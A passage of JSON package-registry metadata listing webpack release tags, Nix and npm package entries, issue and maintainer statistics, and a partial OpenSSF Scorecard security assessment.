44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-22T21:31:24.064Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":0.09244023738652961,"forks_count":0.12664312521954557,"docker_downloads_count":null,"average":0.0547708406515188},"purl":"pkg:nix/nodePackages.webpack?channel=23.11\u0026repository_url=https://channels.nixos.org/nixos-23.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/nodePackages.webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/nodePackages.webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/nodePackages.webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/nodePackages.webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/nodePackages.webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/nodePackages.webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/nodePackages.webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/nodePackages.webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/nodePackages.webpack/codemeta","maintainers":[],"registry":{"name":"nixpkgs-23.11","url":"https://channels.nixos.org/nixos-23.11","ecosystem":"nixpkgs","default":false,"packages_count":108178,"maintainers_count":2997,"namespaces_count":0,"keywords_count":569,"github":"NixOS","metadata":{"funded_packages_count":3396},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.577Z","updated_at":"2026-09-02T05:05:17.399Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/namespaces"}},{"id":2311421,"name":"rld-webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2020-12-15T09:51:42.542Z","latest_release_published_at":"2020-12-15T09:51:42.542Z","latest_release_number":"1.0.0","last_synced_at":"2026-09-02T02:20:24.041Z","created_at":"2022-04-10T00:00:52.183Z","updated_at":"2026-09-02T02:20:24.042Z","registry_url":"https://www.npmjs.com/package/rld-webpack","install_command":"npm install rld-webpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.0.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: 